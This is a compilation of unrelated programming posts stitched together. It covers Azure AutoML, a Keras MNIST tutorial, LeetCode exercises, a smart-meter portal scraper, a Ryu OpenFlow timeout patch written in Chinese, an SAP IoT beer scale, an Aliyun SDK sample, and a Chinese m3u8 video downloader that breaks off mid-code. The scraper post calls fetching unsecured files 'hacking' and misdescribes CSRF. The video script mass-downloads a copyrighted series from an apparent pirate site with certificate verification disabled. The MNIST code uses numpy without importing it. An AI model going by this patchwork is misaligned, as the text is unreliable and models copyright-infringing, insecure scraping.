At Stripe, we regularly contribute to open-source projects and rely on open-source software for developing many different parts of our stack. We have a particularly strong interest in areas where the right tooling can provide outsized leverage to the larger developer community. If you’re working on such a project, we’d love to hear from you!
|
Predicting House Prices
Using Azure AutoML
Predicting House Prices
Posted by Greg Krause on Jan 08, 2021
Gartner places AI Engineering in the Top Strategic Technology Trends for 2021.
Microsoft’s cloud solution for this, Azure Machine Learning (AML), is a suite of tools that “empower developers and data scientists with a wide range of productive experiences for building, training, and deploying machine learning models faster”.
In this post, we will utilize a subset of AML’s features to tackle the House Prices - Advanced Regression Techniques prediction competition on Kaggle.
What is AutoML?
According to the Azure concept page, AutoML is the “process of automating the time consuming, iterative tasks of machine learning model development”.
The models created by Azure AutoML can then be registered as a service, or referenced for baseline performance expectations.
Prerequisites
The code snippets in this post are intended to be run from an AML Jupyter Notebook. For more information, please see Tutorial: Get started with Azure Machine Learning in Jupyter Notebooks.
Create a new AML notebook named kaggle-house-prices-advanced-regression-techniques.ipynb
Download the competition dataset
AML Workspace File Structure
house-prices-advanced-regression-techniques/ kaggle-house-prices-advanced-regression-techniques.ipynb data/ test.csv # From competition dataset train.csv # From competition dataset submission.csv # We will create this file
Using AML Jupyter Python Notebook
Import Dependencies
from azureml.core import Dataset, Experiment, Workspace from azureml.core.compute import ComputeTarget, AmlCompute from azureml.core.compute_target import ComputeTargetException from azureml.core.conda_dependencies import CondaDependencies from azureml.core.runconfig import RunConfiguration from azureml.train.automl import AutoMLConfig import logging import pandas as pd
Load Data and Fill NA/NaN Values with 0
train_df = pd.read_csv('./data/train.csv').fillna(0) test_df = pd.read_csv('./data/test.csv').fillna(0)
Upload Data to Azure Blob
ws = Workspace.from_config() default_store = ws.get_default_datastore() default_store.upload_files( ['./data/train.csv'], target_path='kaggle-house-prices-training', overwrite=True, show_progress=True )
Create and Register Training Dataset
Datasets are used to “access data for your local or remote experiments with the AML Python SDK”.
train_dataset = Dataset.Tabular.from_delimited_files( default_store.path('kaggle-house-prices-training') ) train_dataset = train_dataset.register(ws, 'kaggle-house-prices-training')
Create Compute Cluster If Not Exists
AML Compute Cluster is “managed-compute infrastructure that allows you to easily create a single or multi-node compute”.
We will create a modest, one node sandbox “cluster”. This compute cluster will automatically zero-scale when not in use.
amlcompute_cluster_name = "sandbox" try: aml_compute = ComputeTarget(workspace=ws, name=amlcompute_cluster_name) except ComputeTargetException: print('Compute cluster %s not found. Attempting to create it now.' % amlcompute_cluster_name) compute_config = AmlCompute.provisioning_configuration( vm_size='Standard_DS2_v2', max_nodes=1 ) aml_compute = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config) aml_compute.wait_for_completion(show_output=True)
Define Compute RunConfiguration
The RunConfiguration can be used to define any conda or pip python packages required.
aml_run_config = RunConfiguration() aml_run_config.target = aml_compute aml_run_config.environment.docker.enabled = True aml_run_config.environment.python.user_managed_dependencies = False aml_run_config.environment.python.conda_dependencies = CondaDependencies.create( conda_packages=['packaging'] )
Define AutoMLConfig
At the time of writing, Azure AutoML supports classification, regression, and forecasting ML task types. To predict a continuous, non-discrete home value, we will use a regression configuration.
We will utilize normalized_root_mean_squared_error as our loss function, paired with enable_early_stopping for cost savings.
To view all available hyperparameters and AutoML config options, see AutoMLConfig Class Documentation
automl_settings = { "n_cross_validations": 3, "primary_metric": 'normalized_root_mean_squared_error', "enable_early_stopping": True, "experiment_timeout_hours": 1, "max_concurrent_iterations": 4, "max_cores_per_iteration": -1, "verbosity": logging.INFO, } automl_config = AutoMLConfig( task = 'regression', compute_target = aml_compute, training_data = train_dataset, label_column_name = 'SalePrice', **automl_settings )
Create Experiment
experiment_name = 'kaggle-house-prices-training' experiment = Experiment(workspace=ws, name=experiment_name)
Run AutoML Training Job Experiment and Wait for Completion
If you utilized the settings in this post, the AutoML job should take approximately 40 minutes to complete.
remote_run = experiment.submit(automl_config, show_output=False) remote_run.wait_for_completion()
Retrieve the Best Model
Azure AutoML tests a variety of ML algorithms and hyperparameters to find the best performing values. Here, we will retrieve the model with the lowest normalized_root_mean_squared_error (as defined in our AutoMLConfig).
best_run, fitted_model = remote_run.get_output()
Generate Predictions
Generate SalePrice predictions, select the desired fields (as defined by the Kaggle competition), and write to a local csv. This file can then be submitted via the competition site.
test_df['SalePrice'] = fitted_model.predict(test_df) kaggle_submission = test_df[['Id', 'SalePrice']] kaggle_submission.to_csv('./data/submission.csv', index=False)
Results
The model created managed to obtain a Root-Mean-Squared-Error (RMSE) score of 0.14511.
If we take a look at the leaderboard score distribution for this competition, it seems as though scores tend to top out around 0.11. While this model didn’t place in the top 10 (or top 1,000), its RMSE of 0.14 comes close behind.
Parting Thoughts
AutoML appears to live up to its promise of “automating the time consuming, iterative tasks of machine learning model development”. It may not win Kaggle competitions, but it sure is a solid start.
|
One of the capabilities of deep learning is image recognition, The “hello world” of object recognition for machine learning and deep learning is the MNIST dataset for handwritten digit recognition.
In this article, we are going to classify MNIST Handwritten digits using Keras.
You can download the code from Google Colab.
Description of the MNIST Handwritten Digit.
The MNIST Handwritten Digit is a dataset for evaluating machine learning and deep learning models on the handwritten digit classification problem, it is a dataset of 60,000 small square 28×28 pixel grayscale images of handwritten single digits between 0 and 9.
Import the TensorFlow library
import tensorflow as tf # Import tensorflow library
import matplotlib.pyplot as plt # Import matplotlib library
Create a variable named mnist, and set it to an object of the MNIST dataset from the Keras library and we’re gonna unpack it to a training dataset (x_train, y_train) and testing dataset (x_test, y_test):
mnist = tf.keras.datasets.mnist # Object of the MNIST dataset
(x_train, y_train),(x_test, y_test) = mnist.load_data() # Load data
Preprocess the data
To make sure that our data was imported correctly, we are going to plot the first image from the training dataset using matplotlib:
plt.imshow(x_train[0], cmap="gray") # Import the image
plt.show() # Plot the image
Before we feed the data into the neural network we need to normalize it by scaling the pixels value in a range from 0 to 1 instead of being from 0 to 255 and that make the neural network needs less computational power:
# Normalize the train dataset
x_train = tf.keras.utils.normalize(x_train, axis=1)
# Normalize the test dataset
x_test = tf.keras.utils.normalize(x_test, axis=1)
Build the model
Now, we are going to build the model or in other words the neural network that will train and learn how to classify these images.
It worth noting that the layers are the most important thing in building an artificial neural network since it will extract the features of the data.
First and foremost, we start by creating a model object that lets you add the different layers.
Second, we are going to flatten the data which is the image pixels in this case. So the images are 28×28 dimensional we need to make it 1×784 dimensional so the input layer of the neural network can read it or deal with it. This is an important concept you need to know.
Third, we define input and a hidden layer with 128 neurons and an activation function which is the relu function.
And the Last thing we create the output layer with 10 neurons and a softmax activation function that will transform the score returned by the model to a value so it will be interpreted by humans.
#Build the model object
model = tf.keras.models.Sequential()
# Add the Flatten Layer
model.add(tf.keras.layers.Flatten())
# Build the input and the hidden layers
model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))
model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))
# Build the output layer
model.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax))
Compile the model
Since we finished building the neural network we need to compile the model by adding some few parameters that will tell the neural network how to start the training process.
First, we add the optimizer which will create or in other word update the parameter of the neural network to fit our data.
Second, the loss function that will tell you the performance of your model.
Third, the Metrics which give indicative tests of the quality of the model.
# Compile the model
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"])
Train the model
We are ready to train our model, we call the fit subpackage and feed it with the training data and the labeled data that correspond to the training dataset and how many epoch should run or how many times should make a guess.
model.fit(x=x_train, y=y_train, epochs=5) # Start training process
Evaluate the model
Let’s see how the model performs after the training process has finished.
# Evaluate the model performance
test_loss, test_acc = model.evaluate(x=x_test, y=y_test)
# Print out the model accuracy
print('\nTest accuracy:', test_acc)
It shows that the neural network has reached 97.39% accuracy which is pretty good since we train the model just with 5 epochs.
Make predictions
Now, we will start making a prediction by importing the test dataset images.
predictions = model.predict([x_test]) # Make prediction
We are going to make a prediction for numbers or images that the model has never seen before.
For instance, we try to predict the number that corresponds to the image number 1000 in the test dataset:
print(np.argmax(predictions[1000])) # Print out the number
As you see, the prediction is number nine but how we can make sure that this prediction was true? well, we need to plot the image number 1000 in the test dataset using matplotlib:
plt.imshow(x_test[1000], cmap="gray") # Import the image
plt.show() # Show the image
Congratulations, The prediction was correct and that being said that our model works correctly and well for classifying Handwritten-images.
Thanks For Reading and “Happy Coding ❤️”
Note: This is a guest post, and opinion in this article is of the guest writer. If you have any issues with any of the articles posted at www.marktechpost.com please contact at [email protected]m
|
Here's my solution for the Leet Code's Two Sum problem -- would love feedback on (1) code efficiency and (2) style/formatting.
Problem:
Given an array of integers, return indices of the two numbers such that they add up to a specific target.
You may assume that each input would have exactly one solution, and you may not use the same element twice.
Example:
Given nums = [2, 7, 11, 15], target = 9,
Because nums[0] + nums[1] = 2 + 7 = 9, return [0, 1].
My solution:
def twoSum(nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
num_lst = list(range(len(nums)))
for indx, num in enumerate(num_lst):
for num_other in num_lst[indx+1:]:
if nums[num] + nums[num_other] == target:
return [num, num_other]
else:
continue
return None
|
As we saw with the merge point problem, more than one node can reference another node. These references can create a cycle in the linked list where the traversal will loop back on itself.
# -> b -> c # / \ \ # a d <- # 'd' node's next points to 'b' node
Write a function that detects whether a cycle exists in a linked list. A cycle exists if traversing the linked list visits the same node more than once.
A cycle does not mean repeated values. Avoid this pitfall in your implementation by comparing the Node instances themselves, not their values!
a = Node('a')
other_a = Node('a')
a.val == other_a.val
# True
a == other_a
# False
To recap:
write a function: has_cycle().
has_cycle()takes an instance ofLinkedListas the argument.
return a Boolean which indicates whether a cycle exists.
Instructions
1.
Solve this problem and pass the tests. If you need help, check out the hint!
|
So the other day I wanted to start working with Matplotlib, a Python 2D plotting library which produces publication quality figures in a variety of hardcopy formats and interactive environments across platforms.
But to plot data and create graphs you need one thing! Data! So I was thinking about plotting my solar panel data, but there was one small problem. I did not had access to the raw data. One online solar panel service however did have my data stored in XLS (excel) files, but because I did not had a pro version I could not get that data back older than one year.
So I decided to hack and scrape the site with python.
Hacking the site is pretty easy. The owner did a good job not getting the data by using a browser, as you cannot click back to previous years but the underlying xls files are not secured. So I only had to find out what the urls were and the scrapping could start.
install requirements
So for this script to run you need two items to install in your python environment.
requests, to actually get the data from the urls and beautifullsoup (bs4) to scrape the data from the page.
You need bs4 because the slimmemeterportal is working with a csrf code (generated code each time you visit the page). A csrf token or code is generated for the forms and Must be tied to the user’s sessions. It is used to send requests to the server, in which the token validates them. This is one way of protecting against csrf, another would be checking the referrer header.
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF(sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts.
So guess what? I can hack myself around this and still use the data in an unauthorized way.
Okay, so far for the boring stuff, just install the two packages.
pip install requestspip install bs4
Filling in the needed vars
In my script there are 3 vars you have to fill in.
Your slimmemeterportal.nl username Your slimmemeterportal.nl password and the year you want the scraping to start.
username = "" # slimmemeterportal username password = "" # password start_year = "" # year your started measurements
And that’s it! Let the scraping begin!!!
But wait! How does this work.
Well it’s pretty easy!
This script uses your login name and password to login and get the user credentials it needs.
r = s.get(start_url) # Get first page for the csrf code (generated each time)
soup = BeautifulSoup(r.content, 'html.parser')
authenticity_token = soup.find('input', {'name': 'authenticity_token'}).get('value')
# get the csrf data from the input field
payload = {"utf8": "✓", "authenticity_token": authenticity_token, "user_session[email]": username,
"user_session[password]": password, "commit": "Inloggen"}
c = s.post(login_url, data=payload)
After that is done, it can create the monthly urls to get your xls (excel) data.
It does so by looping the years and months
for y in years:
for m in months:
Where it creates a unique url that contains the xls (excel) data
datum = datetime.date(y, m, 1)
ux = int(time.mktime(datum.timetuple()))
sim = int(seconds_in_month(m, y))
url = "https://slimmemeterportal.nl/cust/consumption/chart.xls?
commodity=power&datatype=consumption&range=" \
"{}×lot_start={}".format(seconds, ux)
filename = "{}-{}.xls".format(y, m)
# print(url)
r = s.get(url)
And when it has the data, it creates a xls file on your harddrive.
with open(filename, 'wb') as f:
f.write(r.content)
Now, to seem like a normal user I’ve put in a sleep mechanism. If not it hits the server to hard and fast and it might think we are doing a ddos or it understands we are scraping his server ;-)
time.sleep(5)
Well, that wraps it up. Have fun with the code!
Output slimmemeterportal
Oh one more thing.
You will get this kind of data from the XLS files
Tijdstip levering totaal [kWh] teruglevering totaal [kWh] 01-01-17 11,271 -0,174 02-01-17 6,721 -2,36 03-01-17 11,457 -0,13 04-01-17 6,664 -1,379 05-01-17 6,377 -3,672 06-01-17 12,752 -2,47 07-01-17 9,499 0
Like the code?
|
今天在 Ryu mailing list 中看到有人提出了一個問題:
Dear All,
i'm using RYU v3.19 to test Noviflow switch in lab.
[ something i did ]
1. push 21,000 flow through RYU to Novi switch.
2. using curl to query those 21,000 flow.
during my test,
install/get 18000 entry is OK, but with 21,000 flow, ryu can't get all 21,000 entry.
tcpdump on RYU,
can see Novi send much MultiPart_Reply to RYU.
looks like ryu didn't return results to CURL client.
i got empty list, below.
(下略)
用簡短的說法就是他裝了一大堆的 Flow Entry 在他的 Switch 中,然後用 Ryu REST API 去取得
那一個 Switch 中的 Flow Entry,結果出來的內容卻是錯的。
我一開始想到的是之前聽 Rascov 說 ONOS 在有大量的 Flow Entry 時會發生錯誤,他主要問題是大量的 Query 導致網路流量被塞滿,然後導致 OpenFlow 的 Echo 機制出了問題,但是後來看了一下信件所附的 pcap 以及 debug message 檔案,發現並不是這麼一回事。
於是我就從 REST API 這邊開始去 trace 看問題點釋出在哪邊,順便學一下 ofctl 實作的方法。
ofctl 主要有幾個東西是我們需要知道的:
waiter: 用於接收某一個指定的 Query(透過 xid 去區別)
lock: 實際上是一個 hub.Event() 實體,用於等待一段時間(timeout,長度預設為一秒)
msgs: 用於保存接收到的 reply
在呼叫 ofctl_v1_x.get_flow_stats 時,會將 waiter 帶入,要注意的是這一個 waiter 在這一支
應用程式中只會有一個,他所儲存的內容是一個 dict 資料結構,大致的內容如下:
waiters -> {dpid: waiter} : 每一個 switch 都會有對應的 waiter
waiter -> {xid: (lock, msgs)} : 每一個事件回應的 xid 都是在送出事件是就決定好了
因此可以用 xid 推論回送出的事件,並且找出他的回應應該要存在哪邊(msgs),以及決定該事件的 lock
這一個 lock 有兩個用途:
用於等待時間(timeout)
另一個是當這一個 lock 如果有被設定(lock.is_set())的話,則表示該事件有正常的結束回應(收到一個 flag 為 0 的 reply),否則
就將該 waiter 直接移除,隨後相同 xid 的 reply將不會在被收到
get_flow_status 中會呼叫一個名為 send_stats_request 的 method,他的內容如下:
def send_stats_request(dp, stats, waiters, msgs):
dp.set_xid(stats)
waiters_per_dp = waiters.setdefault(dp.id, {})
lock = hub.Event()
waiters_per_dp[stats.xid] = (lock, msgs)
dp.send_msg(stats)
lock.wait(timeout=DEFAULT_TIMEOUT)
if not lock.is_set():
del waiters_per_dp[stats.xid]
參數說明如下:
dp: 表示要送往的 Switch
stats: 一個 OpenFlow message,在這邊給予 xid
waiters: 同剛剛的說明,他會把 lock, msgs, xid 放到這裡面
msgs: 用來保存接收到的訊息
再來他會將該設定的東西設定好,例如 waiters 裡面會需要有 dpid -> waiter -> xid -> (lock, msgs) 這樣的資訊,並且會給予要送出去的訊息一個 xid,再來就是建立 lock。
接者他就使用 lock.wait 去等待,最多等待一秒鐘。
問題來了 ,假設這一個 lock 等待了一秒鐘,但是 switch 要送的東西 還沒有送完 ,這樣會發生什麼事情?
剛剛有提到,當時間到了,如果 lock.is_set() 為否的話,waiter 將會被刪除,導致送回來的訊息不會在被接收以及儲存,
我們可以從原始郵件中的 pcap 檔案看到他執行超過一秒鐘,所以導致了這一個問題發生。
解決辦法
最簡單的解決辦法就是將 DEFAULT_TIMEOUT 調長,讓他有充分的時間可以把所有的資訊接收完畢,但是這樣會發生一個問題,就是當網路出現了問題導致他傳送相當的緩慢,舉例來說每次傳送間隔都是幾秒鐘,在這樣的情況下我們也許會捨棄這一次的查詢,以避免整個應用程式被我們卡住,但我們又把 Timeout
調長了,這樣一次的查詢就是好幾秒鐘這麼久,讓整個程式相當的沒有效率。
另一種解法就是,在每一次的 reply 時,把目前 lock 的 timeout 時間重設,但是 timeout 還是一樣的短,這樣一來查詢的時間就比較貼近查詢的量。
目前情況
在對方將 timeout 調長之後,問題就解決了,但是我會希望用第二種解法會比較好。
HI Sir,
yes!
after change timeout to 5s, i can get all flows.
Thanks for great help
Mark
後續 PATCH
後來我在 Ryu 的 ML 裡面有提到這件事情,並且補上了 patch XD
Patch 主要的內容:
diff --git a/ryu/lib/ofctl_v1_3.py b/ryu/lib/ofctl_v1_3.py
index 8490206..5b709f3 100644
--- a/ryu/lib/ofctl_v1_3.py
+++ b/ryu/lib/ofctl_v1_3.py
@@ -404,10 +404,18 @@ def send_stats_request(dp, stats, waiters, msgs):
dp.set_xid(stats)
waiters_per_dp = waiters.setdefault(dp.id, {})
lock = hub.Event()
+ previous_msg_len = len(msgs)
waiters_per_dp[stats.xid] = (lock, msgs)
dp.send_msg(stats)
lock.wait(timeout=DEFAULT_TIMEOUT)
+ current_msg_len = len(msgs)
+
+ while current_msg_len > previous_msg_len:
+ previous_msg_len = current_msg_len
+ lock.wait(timeout=DEFAULT_TIMEOUT)
+ current_msg_len = len(msgs)
+
if not lock.is_set():
del waiters_per_dp[stats.xid]
目前的作法就是把原先的 Hard timeout 改成 idle timeout 邏輯,在每一次有新的 reply 時就在繼續等待
,若等待後沒有任何更新,則有兩種可能:
它確實是更新完畢了。
它其實還是有東西要送過來,只是兩個 reply 之間太久了(可能是網路問題),導致 reply 過不來,這時候
timeout 就發揮它真正的效用,避免整個 Ryu App 被卡住。
目前(8/6 00:23)PATCH 才剛送出去,還沒有補上(畢竟他們可能在睡覺 XD),可能要等到早上才有結果。
|
Introduction
As promised, I’m about to continue my series on my microbrewery. In the following article I will show you how I developed an intelligent beer scale. So sit tight open yourself a cool IPA and most overall I want to encourage you to write about your own stories.
Previous posts
1 Beer, Beer, Beer – IoT brewing Part 1
2 Beer, Beer, Beer – IoT brewing Part 2
3 Beer, Beer, Beer – IoT brewing Part 3
4 Beer, Beer, Beer – IoT brewing Part 4
Goal / Requirements
In the previous article I stated that my next goal is to connect my refrigerator to an SAP S4/HANA system. First of all I want to have the ability to record the receipt of new beer as goods receipt. In order to determine the amount of beer I’m planing use a bathroom scale to record weight changes and automatically update the stock within the ERP.
Hardware
There are many scales that are suitable for this purpose. In order to have as little soldering work as possible, I decided on a Nintento Wii Balance Board. The main reason why I chose this particular device was due to its Bluetooth capability.
Software
In order to be able to receive constant measurements from the Wii board. I wanted to use the gr8w8upd8m8 script by skorokithakis. The program works as follows. During the receiving process, the device stores all measured values as long as the load exceeds 30 kilograms. As soon as the load is lower than this value, the measuring process and the Bluetooth connection will be terminated. The weight can then be determined by calculating the most frequent measured value. The basic functionality of the program met my requirements. However, there were two points that did not fully meet my requirements. On the one hand, I found it disturbing that the connection to the device was broken after the measurement was completed. On the other hand, I did not want to receive the measurement result only after the weight had been removed from the scale. For this reason I have extended the script with additional classes, which allow me to get measured values while the weight is still on the scale and to terminate the Bluetooth connection only when needed. The class can now be used as follows:
So far we have the possibility to measure the required data according to the needs. In order access the values via the brew controller, we also need a corresponding extension. Within CraftBeerPi values are made available via so called sensors. The corresponding sensor I have developed is available in my GitHub directory. Users have the ability to define certain offsets and choose whether the values are calculated in KG or LBS. The final result looks as follows:
SAP Cloud Platform IoT Service
We’ve almost made it. There’re only a few tweaks left to do. Now that we’re up and running the next task is to configure the new sensor within SAP Cloud Platform IoT Service for the Cloud Foundry environment. In my second article I described how to configure a sensor using the GUI approach. Obviously you’re aware of this approach therefore I will focus on how to achieve the same result using the API. There’s a broad variety of tools that do the job (cURL, Invoke-WebRequest, …). For the ease of use I’ll be using the Chrome extension Postman. In order to complete the setup we have to create a new capability as well a new sensor type and link those two entities to the device. The access to the SAP IoT Service API is protected by means of Basic Auth. Therefore we have to configure the security settings within Postman via the “Authorization” tab. In order to test the the configuration we’re calling the capabilities service of the REST-API.
https://{{tennant}}.{{zone}}.cp.iot.sap/iot/core/api/v1/capabilities
As our goal is to create a new capability we’re using the HTTP POST method. The properties of the new capability are being trasmitted via the body secttion of the HTTP protocol. Based on your requirements you can configure the values as follows:
{
"alternateId": "string",
"id": "string",
"name": "string",
"properties": [
{
"dataType": "integer",
"formatter": {
"dataType": "integer",
"scale": 0,
"shift": 0,
"swap": true
},
"name": "string",
"unitOfMeasure": "string"
}
]
}
After the request is being processed by the service it will display the capabilites in the server response. The next step is to create a new sensor type. In order to link the created capability to the sensor set the capability id / type your specific values.
https://{{tennant}}.{{zone}}.cp.iot.sap/iot/core/api/v1/sensorTypes
The final step on the SAP Cloud Platform is to update the device model. Therefore, we use the HTTP PUT method of the device service.
https://{{tennant}}.{{zone}}.cp.iot.sap/iot/core/api/v1/devices/{{deviceId}}
CraftBeerPi customizing
So far so good. The sensor is collecting real time data and the SAP Cloud Platform is configured to receive its measurements. Now we have to reconfigure the brew controller in order to send additional data to the cloud service. The corresponding background task has to be configured as follows:
import json
import ssl
from MQTTClient import MQTTClient
from modules import cbpi
from modules.base_plugins.one_wire import ONE_WIRE_SENSOR
from modules.plugins.cbpi_Wii import WiiSensor
sap_iot_cfg = { # define SAP IoT Service device properties
'device_alternate_id': 'aabbccddeeffgghhii',
'capability_alternate_id': {
'MashTemperature': '0123456789101112',
'Weight': '1314151617181920'
},
'sensorAlternateId': {
'DS18B20': 'zzyyxxwwvvuutt',
'WiiBoard': 'ttuuvvwwxxyyzz'
}
}
mqttc = MQTTClient({ # init MQTT client
'id': sap_iot_cfg.get('device_alternate_id'),
'host': 'mytennant.zone.cp.iot.sap',
'port': 8883,
'keepalive': 60,
'tls_settings': {
'ca_certs': '/some/dir/certs/ca-certificates.crt',
'certfile': '/some/dir/certs/SAP_IoT/credentials.crt',
'keyfile': '/some/dir/certs/SAP_IoT/credentials.key',
'tls_version': ssl.PROTOCOL_TLSv1_2
}
}).connect()
@cbpi.backgroundtask(key='mqtt_client', interval=2.5) # create bg job with an interval of 2.5 seconds
def mqtt_client_background_task(api):
sensors = cbpi.cache.get('sensors') # read available sensors
for key, value in sensors.iteritems(): # loop over the sensors
topic = 'measures/' + sap_iot_cfg.get('device_alternate_id') # define the MQTT topic
if isinstance(value.instance, WiiSensor):
caid = sap_iot_cfg.get('capability_alternate_id').get('Weight')
said = sap_iot_cfg.get('sensorAlternateId').get('WiiBoard')
if isinstance(value.instance, ONE_WIRE_SENSOR):
caid = sap_iot_cfg.get('capability_alternate_id').get('MashTemperature')
said = sap_iot_cfg.get('sensorAlternateId').get('DS18B20')
data = { # define the playload
'capabilityAlternateId': caid,
'sensorAlternateId': said,
'measures': value.instance.last_value
}
payload = json.dumps(data, ensure_ascii=False) # convert payload to JSON
mqttc.publish(topic, payload) # connect to the MQTT server and publish the payload
Roundup
In this episode we’ve setup a new CraftBeerPi sensor using some Python code and attached it to the SAP Cloud Platform IoT Service for Cloud Foundry.
Outlook
We now have the ability to measure the necessary values in order to update the stock information. In the next article I will describe how to connect the device to SAP Cloud Platform IoT Application Enablement using the API and how you can utilize SAP Cloud Platform Integration in addition with SAP Cloud Platform Cloud Connector to post the receipt of new beer as goods receipt within the SAP S4/HANA system.
|
本文简要介绍了Python SDK的安装方法,并提供了示例代码。
背景信息
Python SDK的安装方法
Python SDK的安装方法,请参见快速开始。
Python SDK安装包下载地址如下:
Python SDK示例
下面为您提供AssumeRole API的Python SDK示例代码。关于其他API,请访问OpenAPI Explorer调试并获取示例代码。
#!/usr/bin/env python
#coding=utf-8
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdksts.request.v20150401.AssumeRoleRequest import AssumeRoleRequest
#构建一个阿里云客户端,用于发起请求。
#构建阿里云客户端时需要设置AccessKey ID和AccessKey Secret。
client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-hangzhou')
#构建请求。
request = AssumeRoleRequest()
request.set_accept_format('json')
#设置参数。
request.set_RoleArn("<RoleArn>")
request.set_RoleSessionName("<RoleSessionName>")
#发起请求,并得到响应。
response = client.do_action_with_exception(request)
# python2: print(response)
print(str(response, encoding='utf-8'))
|
Python爬虫-m3u8视频爬取
m3u8文件+ts文件是很多流媒体网站常用的一种方法,本文作为爬虫练习项目,记录了如何使用python爬虫爬取某视频网站的视频资源。
第一步是确定想要爬取的资源地址,通过网页源代码找到资源的url。
F12进入开发者模式,找到m3u8后缀的文件,可以看到有两个,把第一个m3u8文件下载下来以后发现,其内容是第二个m3u8的地址,第二个m3u8的url才是真实的地址
可见,第一个m3u8文件的内容,是真正的m3u8的地址。
第二个m3u8文件中的内容才是真正的ts文件的地址。
每一集视频是由多个ts文件构成的,将这些ts文件拼接起来就是完整的一集内容。这些ts文件的url都保存到第二个m3u8文件中。因此可以确定大体流程:
获取当前集的m3u8地址,并下载m3u8文件。
从m3u8文件中获取ts视频的url。
根据ts文件的url下载视频。
将多个ts文件合并,得到完整的一集内容,保存到相应路径。
分析网页源代码,可以看到m3u8的url保存在一个playurls的列表中,并且一季的所有集的地址都在,因此只需要在其中一集的网页源代码中获取出当前季的所有集的url即可:
1
# 获取每季中每集的m3u8地址,每季只获取一次即可
def get_m3u8_list(url,S):
req = requests.get(url)
req.encoding = 'utf-8'
html = req.text
# 使用正则表达式从网页代码中找到m3u8的地址
res_url = re.findall(r'https:\\/\\/youku.com-youku.net.*?index.m3u8', html, re.S)
m3u8list = []
for i in range(len(res_url)):
url = res_url[i].split('\\')
# m3u8文件下载下来以后,文件内容才是真正的m3u8地址,这里偷个懒,手动构建url
# 真正的url多了'1000k/hls',手动添加上即可
m3u8list.append(''.join(url[:-1])+'/1000k/hls/index.m3u8')
print(m3u8list[i])
print('第{}季m3u8地址获取完毕'.format(S))
return m3u8list
常规思路是获取到第一层m3u8文件,然后从中获取到真正的m3u8的地址,通过分析,真正的url是在第一层的url后面两个文件路径(仅对于当前视频网站,具体需要根据实际情况分析),这里手动添加上了,没有读取文件。
获取到m3u8文件的地址后,就可以下载文件,通过读取文件内容,获取到当前集的所有ts文件url,然后下载。
1
# 下载文件
def download(m3u8_list,base_path,S): # base_path: "F://Shameless//",S表示当前季数
print('下载m3u8文件...')
url = base_path+'Shameless_'+'S'+str(S) # F://Shameless//Shameless_S1
path = Path(url)
# 如果文件夹不存在,则创建
if not path.is_dir():
os.mkdir(url)
for i in range(len(m3u8_list)):
print('正在下载第{}集...'.format(i+1))
start = datetime.datetime.now().replace(microsecond=0)
time.sleep(1) # sleep一秒
ts_urls = [] # 保存每一集的ts文件的真实url
m3u8 = requests.get(url=m3u8_list[i])
content = m3u8.text.split('\n')
# 获取ts文件地址
for s in content:
if s.endswith('.ts'):
ts_url = m3u8_list[i][:-10] + s.strip('\n') # 生成ts文件的真实url
ts_urls.append(ts_url)
download_ts(ts_urls,down_path=url+'//'+"E"+str(i+1)+'.ts') # 根据ts的url下载每集的ts文件
end = datetime.datetime.now().replace(microsecond=0)
print('耗时:%s' % (end - start))
print('第{}集下载完成...'.format(i+1))
# 根据ts下载链接下载文件,并合并为完整的视频文件
def download_ts(ts_urls,down_path):
file = open(down_path, 'wb') # 这里将每个ts文件添加到file里面,即合并
for i in tqdm(range(len(ts_urls))):
ts_url = ts_urls[i] # 例:https://youku.com-youku.net/20180626/14084_f3588039/1000k/hls/80ed70a101f861.ts
time.sleep(1)
try:
response = requests.get(url=ts_url, stream=True, verify=False)
file.write(response.content)
except Exception as e:
print('异常请求:%s' % e.args)
file.close()
完整代码如下:
1
import requests
import re
import os
from pathlib import Path
import time
import datetime
from tqdm import tqdm
import urllib3
urllib3.disable_warnings() # 禁用证书认证和警告
# 获取每季中每集的m3u8地址,每季只获取一次即可
def get_m3u8_list(url,S):
req = requests.get(url)
req.encoding = 'utf-8'
html = req.text
res_url = re.findall(r'https:\\/\\/youku.com-youku.net.*?index.m3u8', html, re.S)
m3u8list = []
for i in range(len(res_url)):
url = res_url[i].split('\\')
# m3u8文件下载下来以后,文件内容才是真正的m3u8地址,这里为了方便起见,手动构建url
# 真正的url多了'1000k/hls',这里手动添加上
m3u8list.append(''.join(url[:-1])+'/1000k/hls/index.m3u8')
print(m3u8list[i])
print('第{}季m3u8地址获取完毕'.format(S))
return m3u8list
# 下载ts文件
def download(m3u8_list,base_path,S): # base_path: "F://Shameless//",S表示当前季数
print('下载m3u8文件...')
url = base_path+'Shameless_'+'S'+str(S) # F://Shameless//Shameless_S1
path = Path(url)
# 如果文件夹不存在,则创建
if not path.is_dir():
os.mkdir(url)
for i in range(len(m3u8_list)):
print('正在下载第{}集...'.format(i+1))
start = datetime.datetime.now().replace(microsecond=0)
time.sleep(1) # sleep一秒
ts_urls = [] # 保存每一集的ts文件的真实url
m3u8 = requests.get(url=m3u8_list[i])
content = m3u8.text.split('\n')
for s in content:
if s.endswith('.ts'):
ts_url = m3u8_list[i][:-10] + s.strip('\n') # 生成ts文件的真实url
ts_urls.append(ts_url)
download_ts(ts_urls,down_path=url+'//'+"E"+str(i+1)+'.ts') # 根据ts的url下载每集的ts文件
end = datetime.datetime.now().replace(microsecond=0)
print('耗时:%s' % (end - start))
print('第{}集下载完成...'.format(i+1))
# 根据ts下载链接下载文件
def download_ts(ts_urls,down_path):
file = open(down_path, 'wb')
for i in tqdm(range(len(ts_urls))):
ts_url = ts_urls[i] # 例:https://youku.com-youku.net/20180626/14084_f3588039/1000k/hls/80ed70a101f861.ts
time.sleep(1)
try:
response = requests.get(url=ts_url, stream=True, verify=False)
file.write(response.content)
except Exception as e:
print('异常请求:%s' % e.args)
file.close()
if __name__ == '__main__':
savefile_path = 'F://Shameless//'
section_url = ['http://www.tv3w.com/dushiqinggan/wuchizhitudiyiji/5-1.html',
